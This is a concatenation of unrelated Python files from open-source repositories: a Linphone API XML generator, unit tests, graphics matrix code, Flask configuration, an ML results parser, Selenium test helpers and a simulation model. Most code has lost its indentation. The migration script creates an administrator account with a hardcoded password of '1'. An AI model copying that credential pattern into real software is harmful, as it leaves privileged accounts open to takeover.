elif returnarg.completeType != 'void':
missingDocWarning += "\tReturn value is not documented\n"
argslist = CArgumentsList()
argslistNode = node.findall('./param')
for argNode in argslistNode:
argType = ''.join(argNode.find('./type').itertext())
argName = ''
argNameNode = argNode.find('./declname')
if argNameNode is not None:
argName = ''.join(argNameNode.itertext())
if argType != 'void':
argslist.addArgument(CArgument(argType, argName, self.enums, self.__structs))
if len(argslist) > 0:
paramdescs = node.findall("./detaileddescription/para/parameterlist[@kind='param']/parameteritem")
if paramdescs:
for arg in argslist.arguments:
for paramdesc in paramdescs:
if arg.name == paramdesc.find('./parameternamelist').find('./parametername').text:
if arg.ctype == 'MSList' or arg.ctype == 'bctbx_list_t':
n = paramdesc.find('.//bctbxlist')
if n is not None:
arg.containedType = n.text
arg.description = self.__cleanDescription(paramdesc.find('./parameterdescription'))
for arg in argslist.arguments:
if arg.description is None:
missingDocWarning += "\t'" + arg.name + "' parameter not documented\n"
f = CFunction(name, returnarg, argslist)
deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']")
if deprecatedNode is not None:
f.deprecated = True
f.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()
f.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))
f.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))
if f.briefDescription == '' and ''.join(f.detailedDescription.itertext()).strip() == '':
return None
locationNode = node.find('./location')
if locationNode is not None:
f.location = locationNode.get('file')
if not f.location.endswith('.h'):
missingDocWarning += "\tNot documented in a header file ('" + f.location + "')\n";
if missingDocWarning != '':
print(name + ":\n" + missingDocWarning)
return f
def __findCFunction(self, tree):
memberdefs = tree.findall("./compounddef[@kind='group']/sectiondef[@kind='func']/memberdef[@kind='function'][@prot='public'][@static='no']")
for m in memberdefs:
f = self.__parseCFunctionMemberdef(m)
if f is not None:
self.add(f)
def initFromFiles(self, xmlfiles):
trees = []
for f in xmlfiles:
tree = None
try:
if self.verbose:
print("Parsing XML file: " + f.name)
tree = ET.parse(f)
except ET.ParseError as e:
print(e)
if tree is not None:
trees.append(tree)
for tree in trees:
self.__findCEnum(tree)
for tree in trees:
self.__findCStruct(tree)
for tree in trees:
self.__findCTypedef(tree)
for tree in trees:
self.__findCFunction(tree)
self.__discoverClasses()
def initFromDir(self, xmldir):
files = [ os.path.join(xmldir, f) for f in os.listdir(xmldir) if (os.path.isfile(os.path.join(xmldir, f)) and f.endswith('.xml')) ]
self.initFromFiles(files)
def check(self):
for c in self.classes:
for name, p in six.iteritems(c.properties):
if p.getter is None and p.setter is not None:
print("Property '" + name + "' of class '" + c.name + "' has a setter but no getter")
class Generator:
def __init__(self, outputfile):
self.__outputfile = outputfile
def __generateEnum(self, cenum, enumsNode):
enumNodeAttributes = { 'name' : cenum.name, 'deprecated' : str(cenum.deprecated).lower() }
if cenum.associatedTypedef is not None:
enumNodeAttributes['name'] = cenum.associatedTypedef.name
enumNode = ET.SubElement(enumsNode, 'enum', enumNodeAttributes)
if cenum.briefDescription != '':
enumBriefDescriptionNode = ET.SubElement(enumNode, 'briefdescription')
enumBriefDescriptionNode.text = cenum.briefDescription
enumNode.append(cenum.detailedDescription)
if len(cenum.values) > 0:
enumValuesNode = ET.SubElement(enumNode, 'values')
for value in cenum.values:
enumValuesNodeAttributes = { 'name' : value.name, 'deprecated' : str(value.deprecated).lower() }
valueNode = ET.SubElement(enumValuesNode, 'value', enumValuesNodeAttributes)
if value.briefDescription != '':
valueBriefDescriptionNode = ET.SubElement(valueNode, 'briefdescription')
valueBriefDescriptionNode.text = value.briefDescription
valueNode.append(value.detailedDescription)
def __generateFunction(self, parentNode, nodeName, f):
functionAttributes = { 'name' : f.name, 'deprecated' : str(f.deprecated).lower() }
if f.location is not None:
functionAttributes['location'] = f.location
functionNode = ET.SubElement(parentNode, nodeName, functionAttributes)
returnValueAttributes = { 'type' : f.returnArgument.ctype, 'completetype' : f.returnArgument.completeType }
if f.returnArgument.containedType is not None:
returnValueAttributes['containedtype'] = f.returnArgument.containedType
returnValueNode = ET.SubElement(functionNode, 'return', returnValueAttributes)
if f.returnArgument.description is not None:
returnValueNode.append(f.returnArgument.description)
argumentsNode = ET.SubElement(functionNode, 'arguments')
for arg in f.arguments:
argumentNodeAttributes = { 'name' : arg.name, 'type' : arg.ctype, 'completetype' : arg.completeType }
if arg.containedType is not None:
argumentNodeAttributes['containedtype'] = arg.containedType
argumentNode = ET.SubElement(argumentsNode, 'argument', argumentNodeAttributes)
if arg.description is not None:
argumentNode.append(arg.description)
if f.briefDescription != '':
functionBriefDescriptionNode = ET.SubElement(functionNode, 'briefdescription')
functionBriefDescriptionNode.text = f.briefDescription
functionNode.append(f.detailedDescription)
def __generateClass(self, cclass, classesNode):
# Do not include classes that contain nothing
if len(cclass.events) == 0 and len(cclass.classMethods) == 0 and \
len(cclass.instanceMethods) == 0 and len(cclass.properties) == 0:
return
# Check the capabilities of the class
has_ref_method = False
has_unref_method = False
has_destroy_method = False
for methodname in cclass.instanceMethods:
methodname_without_prefix = methodname.replace(cclass.cFunctionPrefix, '')
if methodname_without_prefix == 'ref':
has_ref_method = True
elif methodname_without_prefix == 'unref':
has_unref_method = True
elif methodname_without_prefix == 'destroy':
has_destroy_method = True
refcountable = False
destroyable = False
if has_ref_method and has_unref_method:
refcountable = True
if has_destroy_method:
destroyable = True
classNodeAttributes = {
'name' : cclass.name,
'cfunctionprefix' : cclass.cFunctionPrefix,
'deprecated' : str(cclass.deprecated).lower(),
'refcountable' : str(refcountable).lower(),
'destroyable' : str(destroyable).lower()
}
# Generate the XML node for the class
classNode = ET.SubElement(classesNode, 'class', classNodeAttributes)
if len(cclass.events) > 0:
eventsNode = ET.SubElement(classNode, 'events')
eventnames = []
for eventname in cclass.events:
eventnames.append(eventname)
eventnames.sort()
for eventname in eventnames:
self.__generateFunction(eventsNode, 'event', cclass.events[eventname])
if len(cclass.classMethods) > 0:
classMethodsNode = ET.SubElement(classNode, 'classmethods')
methodnames = []
for methodname in cclass.classMethods:
methodnames.append(methodname)
methodnames.sort()
for methodname in methodnames:
self.__generateFunction(classMethodsNode, 'classmethod', cclass.classMethods[methodname])
if len(cclass.instanceMethods) > 0:
instanceMethodsNode = ET.SubElement(classNode, 'instancemethods')
methodnames = []
for methodname in cclass.instanceMethods:
methodnames.append(methodname)
methodnames.sort()
for methodname in methodnames:
self.__generateFunction(instanceMethodsNode, 'instancemethod', cclass.instanceMethods[methodname])
if len(cclass.properties) > 0:
propertiesNode = ET.SubElement(classNode, 'properties')
propnames = []
for propname in cclass.properties:
propnames.append(propname)
propnames.sort()
for propname in propnames:
propertyNodeAttributes = { 'name' : propname }
propertyNode = ET.SubElement(propertiesNode, 'property', propertyNodeAttributes)
if cclass.properties[propname].getter is not None:
self.__generateFunction(propertyNode, 'getter', cclass.properties[propname].getter)
if cclass.properties[propname].setter is not None:
self.__generateFunction(propertyNode, 'setter', cclass.properties[propname].setter)
if cclass.briefDescription != '':
classBriefDescriptionNode = ET.SubElement(classNode, 'briefdescription')
classBriefDescriptionNode.text = cclass.briefDescription
classNode.append(cclass.detailedDescription)
def generate(self, project):
print("Generating XML document of Linphone API to '" + self.__outputfile.name + "'")
apiNode = ET.Element('api')
project.enums.sort(key = lambda e: e.name)
if len(project.enums) > 0:
enumsNode = ET.SubElement(apiNode, 'enums')
for cenum in project.enums:
self.__generateEnum(cenum, enumsNode)
if len(project.classes) > 0:
classesNode = ET.SubElement(apiNode, 'classes')
project.classes.sort(key = lambda c: c.name)
for cclass in project.classes:
self.__generateClass(cclass, classesNode)
		s = ET.tostring(apiNode, 'utf-8').decode('utf-8')	# tostring() already emits the XML declaration
		if project.prettyPrint:
			s = minidom.parseString(s).toprettyxml(indent='\t')
		self.__outputfile.write(s)	# str in both cases, matching the text-mode output file
def main(argv = None):
if argv is None:
argv = sys.argv
argparser = argparse.ArgumentParser(description="Generate XML version of the Linphone API.")
argparser.add_argument('-o', '--outputfile', metavar='outputfile', type=argparse.FileType('w'), help="Output XML file describing the Linphone API.")
argparser.add_argument('--verbose', help="Increase output verbosity", action='store_true')
argparser.add_argument('--pretty', help="XML pretty print", action='store_true')
argparser.add_argument('xmldir', help="XML directory generated by doxygen.")
args = argparser.parse_args()
	if args.outputfile is None:
		args.outputfile = open('api.xml', 'w')
project = Project()
if args.verbose:
project.verbose = True
if args.pretty:
project.prettyPrint = True
project.initFromDir(args.xmldir)
project.check()
gen = Generator(args.outputfile)
gen.generate(project)
if __name__ == "__main__":
sys.exit(main())
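# Example invocation (editor addition; the script filename is an assumption,
# the options match the argparse declaration above):
#   python genapixml.py --verbose --pretty -o api.xml path/to/doxygen/xml
# where the positional argument is the XML directory produced by a doxygen
# run with GENERATE_XML enabled.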
---- [per-row numeric quality metrics and duplicated repo columns omitted] ----
---- next file: yolk/test/utils.py | repo: yolkdata/yolk-python | hexsha: 86686cf65534bfae5dd8d13670449f7c68cf0bb3 | license(s): MIT, Unlicense | size: 2,226 bytes ----
from datetime import date, datetime, timedelta
from decimal import Decimal
import unittest
from dateutil.tz import tzutc
import six
from yolk import utils
class TestUtils(unittest.TestCase):
def test_timezone_utils(self):
now = datetime.now()
utcnow = datetime.now(tz=tzutc())
self.assertTrue(utils.is_naive(now))
self.assertFalse(utils.is_naive(utcnow))
fixed = utils.guess_timezone(now)
self.assertFalse(utils.is_naive(fixed))
shouldnt_be_edited = utils.guess_timezone(utcnow)
self.assertEqual(utcnow, shouldnt_be_edited)
def test_clean(self):
simple = {
'decimal': Decimal('0.142857'),
'unicode': six.u('woo'),
'date': datetime.now(),
'long': 200000000,
'integer': 1,
'float': 2.0,
'bool': True,
'str': 'woo',
'none': None
}
complicated = {
'exception': Exception('This should show up'),
'timedelta': timedelta(microseconds=20),
'list': [1, 2, 3]
}
combined = dict(simple.items())
combined.update(complicated.items())
        pre_clean_keys = list(combined.keys())  # snapshot; .keys() alone is a live view on Python 3
        utils.clean(combined)
        self.assertEqual(list(combined.keys()), pre_clean_keys)
def test_clean_with_dates(self):
dict_with_dates = {
'birthdate': date(1980, 1, 1),
'registration': datetime.utcnow(),
}
self.assertEqual(dict_with_dates, utils.clean(dict_with_dates))
@classmethod
def test_bytes(cls):
if six.PY3:
item = bytes(10)
else:
item = bytearray(10)
utils.clean(item)
def test_clean_fn(self):
cleaned = utils.clean({'fn': lambda x: x, 'number': 4})
self.assertEqual(cleaned['number'], 4)
if 'fn' in cleaned:
self.assertEqual(cleaned['fn'], None)
def test_remove_slash(self):
self.assertEqual('http://segment.io',
utils.remove_trailing_slash('http://segment.io/'))
self.assertEqual('http://segment.io',
utils.remove_trailing_slash('http://segment.io'))
---- [per-row numeric quality metrics and duplicated repo columns omitted] ----
---- next file: 09Scan/matrix.py | repo: kw1122/MKS66 | hexsha: 866878f76f3d3d6bb3a8d89014200d8e8b85019b | license(s): MIT | size: 2,797 bytes ----
"""
A matrix will be an N sized list of 4 element lists.
Each individual list will represent an [x, y, z, 1] point.
For multiplication purposes, consider the lists like so:
x0 x1 ... xn
y0 y1 ... yn
z0 z1 ... zn
 1  1 ...  1
"""
import math
def make_bezier():
return [
[-1, 3, -3, 1],
[3, -6, 3, 0],
[-3, 3, 0, 0],
[1, 0, 0, 0]
]
def make_hermite():
return [
[2, -3, 0, 1],
[-2, 3, 0, 0],
[1, -2, 1, 0],
[1, -1, 0, 0]
]
def generate_curve_coefs(p0, p1, p2, p3, t):
coefs = [[p0, p1, p2, p3]]
if t == 'hermite':
curve = make_hermite()
else:
curve = make_bezier()
matrix_mult(curve, coefs)
return coefs
def make_translate(x, y, z):
t = new_matrix()
ident(t)
t[3][0] = x
t[3][1] = y
t[3][2] = z
return t
def make_scale(x, y, z):
t = new_matrix()
ident(t)
t[0][0] = x
t[1][1] = y
t[2][2] = z
return t
def make_rotX(theta):
t = new_matrix()
ident(t)
t[1][1] = math.cos(theta)
t[2][1] = -math.sin(theta)
t[1][2] = math.sin(theta)
t[2][2] = math.cos(theta)
return t
def make_rotY(theta):
t = new_matrix()
ident(t)
t[0][0] = math.cos(theta)
t[0][2] = -math.sin(theta)
t[2][0] = math.sin(theta)
t[2][2] = math.cos(theta)
return t
def make_rotZ(theta):
t = new_matrix()
ident(t)
t[0][0] = math.cos(theta)
t[1][0] = -math.sin(theta)
t[0][1] = math.sin(theta)
t[1][1] = math.cos(theta)
return t
#print the matrix such that it looks like
#the template in the top comment
def print_matrix(matrix):
s = ''
for r in range(len(matrix[0])):
for c in range(len(matrix)):
            s += str(matrix[c][r]) + ' '
s += '\n'
    print(s)
#turn the paramter matrix into an identity matrix
#you may assume matrix is square
def ident(matrix):
for r in range(len(matrix[0])):
for c in range(len(matrix)):
if r == c:
matrix[c][r] = 1
else:
matrix[c][r] = 0
#multiply m1 by m2, modifying m2 to be the product
#m1 * m2 -> m2
def matrix_mult(m1, m2):
point = 0
for row in m2:
#get a copy of the next point
tmp = row[:]
for r in range(4):
m2[point][r] = (m1[0][r] * tmp[0] +
m1[1][r] * tmp[1] +
m1[2][r] * tmp[2] +
m1[3][r] * tmp[3])
point += 1
def new_matrix(rows = 4, cols = 4):
m = []
for c in range(cols):
m.append([])
for r in range(rows):
m[c].append(0)
return m
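# --- editor sketch (addition): exercising the conventions from the top
# docstring; a matrix is a list of [x, y, z, 1] points, and
# matrix_mult(m1, m2) overwrites m2 with m1 * m2 in place.
if __name__ == '__main__':
    t = make_translate(1, 2, 3)
    pts = [[0, 0, 0, 1], [1, 1, 1, 1]]  # two points
    matrix_mult(t, pts)                 # pts -> [[1, 2, 3, 1], [2, 3, 4, 1]]
    print_matrix(pts)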
---- [per-row numeric quality metrics and duplicated repo columns omitted] ----
---- next file: app/flaskApp/config.py | repo: jeanmarc2019/PTHacks2019-Planning | hexsha: 866977a21872a2e8438dbbd5f5b289547da5a50c | license(s): MIT | size: 641 bytes ----
import configparser
import os
dir_path = os.path.dirname(os.path.realpath(__file__))
dir_path += '/cfg.ini'
class Configuration(object):
def __init__(self,debug=False):
section = "Flask-debug" if debug else "Flask"
cfg = configparser.ConfigParser()
cfg.read(dir_path if debug else "/var/www/html/flaskApp/cfg.ini")
self.debug = cfg.getboolean(section, "DEBUG")
self.csrf_enabled = cfg.getboolean(section,"CSRF_ENABLED")
self.threads_per_page = cfg.getint(section,"THREADS_PER_PAGE")
self.port = cfg.getint(section,"PORT")
self.host = cfg.get(section,"HOST")
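# Editor note: example cfg.ini matching the keys read above (values are
# illustrative, not taken from the repository):
#   [Flask]
#   DEBUG = false
#   CSRF_ENABLED = true
#   THREADS_PER_PAGE = 2
#   PORT = 80
#   HOST = 0.0.0.0
#   [Flask-debug]
#   DEBUG = true
#   CSRF_ENABLED = true
#   THREADS_PER_PAGE = 2
#   PORT = 5000
#   HOST = 127.0.0.1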
---- [per-row numeric quality metrics and duplicated repo columns omitted] ----
---- next file: authentication/migrate.py | repo: anae09/electionWebService | hexsha: 866b4e64606eb0b8b047d742a5c885f477addc0c | license(s): MIT | size: 1,551 bytes ----
from flask import Flask
from configuration import Configuration
from flask_migrate import Migrate, init, migrate, upgrade
from models import database, Role, UserRole, User
from sqlalchemy_utils import database_exists, create_database
application = Flask(__name__)
application.config.from_object(Configuration)
migrateObject = Migrate(application, database)
done = False
while not done:
    try:
        if not database_exists(application.config["SQLALCHEMY_DATABASE_URI"]):
            create_database(application.config["SQLALCHEMY_DATABASE_URI"])
        database.init_app(application)
        with application.app_context():
            init()
            migrate(message="Production migration")
            upgrade()
            adminRole = Role(name="administrator")
            userRole = Role(name="user")
            database.session.add(adminRole)
            database.session.add(userRole)
            database.session.commit()
            admin = User(
                jmbg="0000000000000",
                forename="admin",
                surname="admin",
                email="admin@admin.com",
                password="1"
            )
            database.session.add(admin)
            database.session.commit()
            userRole = UserRole(
                userId=admin.id,
                roleId=adminRole.id
            )
            database.session.add(userRole)
            database.session.commit()
            done = True
    except Exception as err:
        print(err)
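# Editor note: the while/try loop above keeps retrying until the database
# accepts connections and the migration commits, presumably so this script
# can start before the database container is ready.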
---- [per-row numeric quality metrics and duplicated repo columns omitted] ----
---- next file: output/ensemble_analysis.py | repo: gitter-lab/pria-ams-enamine | hexsha: 866b8b6db3282415cf332ea707795a1897c51203 | license(s): MIT | size: 4,066 bytes ----
from __future__ import print_function
import os
import json
import numpy as np
def extract(file_path):
if not os.path.isfile(file_path):
return -1, -1, -1
with open(file_path, 'r') as f:
lines = f.readlines()
test_roc, test_precision, test_NEF = -1, -1, -1
for line in lines:
if 'test precision' in line:
line = line.strip().split(':')
test_precision = float(line[1])
if 'test roc' in line:
line = line.strip().split(':')
test_roc = float(line[1])
if 'ratio: 0.01, NEF:' in line:
line = line.strip().replace('NEF:', '').split(',')
test_NEF = float(line[1])
return test_roc, test_precision, test_NEF
if __name__ == '__main__':
model_list = [
'random_forest_classification',
'xgboost_classification', 'xgboost_regression',
'single_deep_classification', 'single_deep_regression'
]
model_process_num_list = {
'random_forest_classification': [139, 69, 111, 212, 210, 148, 28, 61, 124, 130, 131, 141, 14, 38, 165, 65, 123, 94, 3, 88, 72],
'xgboost_classification': [140, 967, 960, 807, 263, 694, 440, 47, 116, 792, 663, 32, 564, 950, 735, 84, 364, 605, 431, 55, 388],
'xgboost_regression': [187, 6, 514, 507, 880, 440, 605, 718, 754, 409, 586, 214, 753, 65, 294, 911, 721, 81, 321, 545, 280],
'single_deep_classification': [356, 404, 215, 93, 254, 88, 423, 47, 363, 132, 5, 385, 370, 29, 415, 54, 124, 183, 180, 416],
'single_deep_regression': [199, 323, 114, 123, 47, 175, 17, 178, 106, 265, 67, 157, 369, 115, 191, 20, 27, 108, 270, 45],
'ensemble': [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]
}
for model in model_list:
print('Model: {}'.format(model))
number = len(model_process_num_list[model])
hyper_parameter_result_roc = []
hyper_parameter_result_precision = []
hyper_parameter_result_NEF = []
for running_process in model_process_num_list[model]:
test_roc_list, test_precision_list, test_NEF_list = [], [], []
for idx in range(4):
file_path = '{}/{}_{}_{}.out'.format(model, model, running_process, idx)
test_roc, test_precision, test_NEF = extract(file_path)
if test_roc == -1 and test_precision == -1:
print('missing index: {}'.format(running_process))
if test_roc != -1:
test_roc_list.append(test_roc)
if test_precision != -1:
test_precision_list.append(test_precision)
if test_NEF != -1:
test_NEF_list.append(test_NEF)
hyper_parameter_result_roc.append(np.mean(test_roc_list))
hyper_parameter_result_precision.append(np.mean(test_precision_list))
hyper_parameter_result_NEF.append(np.mean(test_NEF_list))
for running_process, roc, pr, NEF in zip(model_process_num_list[model], hyper_parameter_result_roc, hyper_parameter_result_precision, hyper_parameter_result_NEF):
print('{}\t{}\t{}\t{}'.format(running_process, roc, pr, NEF))
print()
    print('On The Last Fold')  # i.e. results on the held-out fold (the _4 files)
model_list = [
'random_forest_classification',
'xgboost_classification', 'xgboost_regression',
'single_deep_classification', 'single_deep_regression',
'ensemble'
]
for model in model_list:
print('Model: {}'.format(model))
number = len(model_process_num_list[model])
for running_process in model_process_num_list[model]:
if model == 'ensemble':
file_path = '{}/{}.out'.format(model, running_process)
else:
file_path = '{}/{}_{}_4.out'.format(model, model, running_process)
test_roc, test_precision, test_NEF = extract(file_path)
print('{}\t{}'.format(running_process, test_NEF))
print()
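# Editor note: reconstructed from the string matching in extract() above, the
# parsed .out files are expected to contain lines of the form (values are
# illustrative):
#   test roc:0.912
#   test precision:0.334
#   ratio: 0.01, NEF: 0.87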
---- [per-row numeric quality metrics and duplicated repo columns omitted] ----
---- next file: openstack_dashboard/test/integration_tests/regions/messages.py | repo: ankur-gupta91/block_storage | hexsha: 866be250cb91ad06867da752bf60c3e580b71448 | license(s): Apache-2.0 | size: 1,687 bytes ----
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common import by
from openstack_dashboard.test.integration_tests.regions import baseregion
ERROR = 'alert-danger'
INFO = 'alert-info'
SUCCESS = 'alert-success'
class MessageRegion(baseregion.BaseRegion):
_close_locator = (by.By.CSS_SELECTOR, 'a.close')
def _msg_locator(self, level):
return (by.By.CSS_SELECTOR, 'div.alert.%s' % level)
def __init__(self, driver, conf, level=SUCCESS):
self._default_src_locator = self._msg_locator(level)
# NOTE(tsufiev): we cannot use self._turn_off_implicit_wait() at this
# point, because the instance is not initialized by ancestor's __init__
driver.implicitly_wait(0)
try:
super(MessageRegion, self).__init__(driver, conf)
except NoSuchElementException:
self.src_elem = None
finally:
self._turn_on_implicit_wait()
def exists(self):
return self._is_element_displayed(self.src_elem)
def close(self):
self._get_element(*self._close_locator).click()
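# Editor note: typical use in a page-object test (a sketch; names other than
# those defined above are assumptions):
#   msg = MessageRegion(driver, conf, level=SUCCESS)
#   assert msg.exists()
#   msg.close()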
---- [per-row numeric quality metrics and duplicated repo columns omitted] ----
---- next file: model_input.py | repo: bgarbin/GUIDE | hexsha: 866d362b7d20329b9a8556ff353eba1624b11b05 | license(s): MIT | size: 8,175 bytes ----
# -*- coding: utf-8 -*-
import numpy as np
#import cmath as cm
# Main parameters for window
# 'record_every': number of time_steps one between two consecutive record events
window_params = {'kernel': 'RK4','nstep_update_plot': 100, 'step_size': 0.01, 'array_size': 10000, 'streaming': True, 'record_state':False, 'nstep_record':1, 'window_size':(1200,1000), 'invert_order_obs_var': True,'theme':'dark'}
# Definition of the plot configuration
def load_docks():
    ''' Returns a dict to be used for plot declarations. Here, we use pyqtgraph docks. Each plot has a dictionary as "value" with keys: "type" (accepted values: 'plot1D', 'plot2D' and 'image', as used below), "zoomOf" (key name of another dock), "position" (accepted values: 'bottom', 'top', 'left', 'right', 'above', or 'below'), "relativeTo" (optional, key name of another dock; position relative to another dock), "size" [(xlength,ylength); note that length arguments are only a suggestion; docks will still have to fill the entire dock area and obey the limits of their internal widgets], "labels" (dict of position:str), "title" (str). '''
docks = {
'plot1' : {'type': 'plot1D' , 'position': 'left' , 'size': (500,500), 'labels':{'bottom':'Time (arb. units)','left':'Intensity (arb. units)'}},
'phase_space' : {'type': 'plot2D', 'position': 'right', 'size': (300,300)},
'plot2' : {'type': 'plot1D' , 'zoomOf': 'plot1' , 'position': 'bottom', 'relativeTo': 'phase_space', 'size': (300,100)},
'plot3' : {'type': 'plot1D', 'position': 'top','relativeTo':'phase_space', 'size': (300,300)},
'custom_name' : {'type': 'image', 'position': 'above','relativeTo':'plot3', 'size': (300,300)},
}
return docks
def load_variables():
    ''' Returns a dict of the variables. Each variable is a dict with keys: "type" (e.g. np.float64, np.complex128), "init_cond" (type), "plot" (bool, optional, default is True), "dock" (list of key name(s) of docks [str] as defined in the load_docks function; optional; if not provided, will be plotted on every plot), "equation" (callable, optional, default is diff_eq_{variable_name}), "help" (str, to be displayed in the help message). Additional keys are added internally: "value", "observable" (False), "lineedit", "checkbox". '''
variables = {
'A' : {'type': np.complex128, 'init_cond': 0., 'plot': False, 'dock':['plot1','plot2'], 'help':'field in the first cavity'},
'B' : {'type': np.complex128, 'init_cond': 0.001, 'plot': False, 'equation': diff_eq_B}
}
return variables
def load_observables():
    ''' Returns a dict of the observables. Similar to variables, observables are added internally to the dictionary of variables. Each observable is a dict with keys: "type" (e.g. np.float64, np.complex128), "init_cond" (type), "plot" (bool, optional, default is True), "dock" (list of key name(s) of docks [str] as defined in the load_docks function; optional; if not provided, will be plotted on every plot), "equation" (callable, optional, default is eq_{observable_name}), "calculation_size" (bool, whether the corresponding variable should only be the size of what the calculation returns; WARNING: those items won't be stored), "help" (str, to be displayed in the help message). Additional keys are added internally: "value", "observable" (True), "lineedit", "checkbox". '''
observables = {
'mod_A' : {'type': np.float64, 'init_cond': 0., 'plot': True, 'dock':['plot1','plot2'], 'help':'modulus square of A'},
'mod_B' : {'type': np.float64, 'init_cond': 0., 'dock':['plot1','plot2','plot3']},
'mod_A_2' : {'type': np.float64, 'init_cond': 0., 'plot': True, 'dock':[{'phase_space':['mod_A_2','mod_B_2']}],'calculation_size':True, 'help':'abs(A)**2 shorter to be plotted in phase space'},
'mod_B_2' : {'type': np.float64, 'init_cond': 0. ,'dock':[{'phase_space':['mod_B_2','mod_A_2']}],'calculation_size':True},
'mod_A_2D' : {'type': np.float64, 'init_cond': 0. ,'dock':['custom_name'],'calculation_size':True,'help':'variable to be used plotted in image'},
#'ph_A' : {'type': np.float64, 'init_cond': 0., 'dock':['plot3']},
#'ph_B' : {'type': np.float64, 'init_cond': 0., 'dock':['plot3']}
}
return observables
def load_params():
    ''' Returns a dict of the parameters. As with variables/observables, each parameter has a dictionary as "value" with keys: "init_cond" (float), "min" (float), "max" (float), "step" (float or int; WARNING: if int, this parameter will be an integer), "help" (str, to be displayed in the help message). Additional keys are added internally: "value", "spinbox", "slider", "slider_conversion_factor". '''
params = {}
params['delta'] = {'init_cond': -8., 'min': -10., 'max': 10., 'step': 0.01, 'help':'detuning parameter'}
params['f'] = {'init_cond': 4.8, 'min': 0. , 'max': 20., 'step': 0.01}
params['kappa'] = {'init_cond': 2.8, 'min': 0. , 'max': 10., 'step': 0.01}
params['gamma'] = {'init_cond': 0. , 'min': -1. , 'max': 1., 'step': 0.01}
params['tau'] = {'init_cond': 1. , 'min': 0. , 'max': 10., 'step': 0.01}
params['npts_PS'] = {'init_cond': 1000 , 'min': 1 , 'max': 2000, 'step': 1}
params['folding'] = {'init_cond': 100 , 'min': 1 , 'max': 1000, 'step': 1}
params['min_scan'] = {'init_cond': 0, 'min': 0., 'max': 500., 'step': 0.01, 'help':'detuning parameter'}
params['max_scan'] = {'init_cond': 10, 'min': 0., 'max': 500., 'step': 0.01, 'help':'detuning parameter'}
params['step_scan'] = {'init_cond': 0.05, 'min': 0.001, 'max': 10., 'step': 0.001, 'help':'detuning parameter'}
params['nstep_scan'] = {'init_cond': 50, 'min': 0, 'max': 500, 'step': 1, 'help':'detuning parameter'}
return params
# BEGIN Declaration of the equations. Automatically recognized patterns are "diff_eq_{variable}" (variables) and "eq_{observable}" (observables); the name after the pattern must match the variable/observable's name. Alternatively, you may use custom equation names, declared in the variable/observable dictionary with the keyword "equation".
def diff_eq_A(ui,variables, params):
return 1j*(params['delta']*params['tau'] + abs(variables['A'])**2)*variables['A'] - variables['A'] + (1j*params['kappa'] + params['gamma'])*params['tau']*variables['B'] + params['f']
def diff_eq_B(ui,variables, params):
return 1j*(params['delta']*params['tau'] + abs(variables['B'])**2)*variables['B'] - variables['B'] + (1j*params['kappa'] + params['gamma'])*params['tau']*variables['A'] + params['f']
def eq_mod_A(ui,variables,params):
return abs(variables['A'])**2
def eq_mod_B(ui,variables,params):
return abs(variables['B'])**2
def eq_mod_A_2(ui,variables,params):
return variables['mod_A'][-params['npts_PS']:]
def eq_mod_B_2(ui,variables,params):
return variables['mod_B'][-params['npts_PS']:]
def eq_mod_A_2D(ui,variables,params):
folding = params['folding']
nb_rt = int(len(variables['mod_A'])/params['folding'])
return np.reshape(variables['mod_A'][-(folding*nb_rt):],(nb_rt,folding))
#def eq_ph_A(variables,params):
#return [cm.phase(temp) for temp in variables['A']] #np.array(np.arctan2(np.imag(variables['A']), np.real(variables['A'])))
#def eq_ph_B(variables,params):
#return [cm.phase(temp) for temp in variables['B']]
def keyboard_keys():
""" Returns a dictionnary of user defined keys of form key:callable. System reserved keys: [" ", "q", "h", "s", "r", "i", "c"]. This must return an empty dict if no extra keys. """
keys = {
't': ramp_f,
}
return keys
#return {}
def ramp_f(ui,variables,params):
print('begin scanning')
for f in np.concatenate((np.arange(params['min_scan'],params['max_scan']+params['step_scan'],params['step_scan']),np.arange(params['max_scan'],params['min_scan']-params['step_scan'],-params['step_scan']))):
f = round(f,2)
ui.set_param('f',f)
ui.run_simulator(params['nstep_scan'])
print('end scanning')
def kernel_my_own(variables,params):
''' Takes as arguments dicts of variables and params as {'key':value}. Returns a dict of the results with the same form. For now the function name must start with "kernel_" '''
pass
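# --- editor sketch (addition): a custom kernel following the docstring above.
# The explicit-Euler step, the fixed dt, and passing None as the ui argument
# of the diff_eq_* functions are assumptions, not part of the original file.
def kernel_euler(variables, params):
    dt = 0.01  # assumed to mirror window_params['step_size']
    return {
        'A': variables['A'] + dt * diff_eq_A(None, variables, params),
        'B': variables['B'] + dt * diff_eq_B(None, variables, params),
    }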
---- [per-row numeric quality metrics and duplicated repo columns omitted] ----
---- next file: input/EnvEq/pairwise/Tneg-Tpro/u_lim_o2Tpro-u_lim_o2Tneg/parallelizer.py | repo: Harshavardhan-BV/Cancer-compe-strat | hexsha: 866eb114075c78f8e3231df363ccab857402a80e | license(s): MIT | size: 1,464 bytes ----
from multiprocessing import Pool
import EnvEq as ee
import numpy as np
import itertools as it
import os
#parsing input into numpy arrays
from input import *
y0=np.array([y0_Tpos,y0_Tpro,y0_Tneg,y0_o2,y0_test])
p=np.array([p_o2,p_test])
mu=np.array([[mu_o2Tpos,mu_o2Tpro,mu_o2Tneg],[mu_testTpos,mu_testTpro,0]])
lam=np.array([lam_o2,lam_test])
t_D=np.array([t_DTpos,t_DTpro,t_DTneg])
r=np.array([r_Tpos,r_Tpro,r_Tneg])
delta=np.array([delta_Tpos,delta_Tpro,delta_Tneg])
rho=np.array([rho_Tpos,rho_Tpro,rho_Tneg])
lim=np.array([[[l_lim_o2Tpos,u_lim_o2Tpos],[l_lim_o2Tpro,u_lim_o2Tpro],[l_lim_o2Tneg,u_lim_o2Tneg]],[[l_lim_testTpos,u_lim_testTpos],[l_lim_testTpro,u_lim_testTpro],[0,0]]],dtype=np.float64)
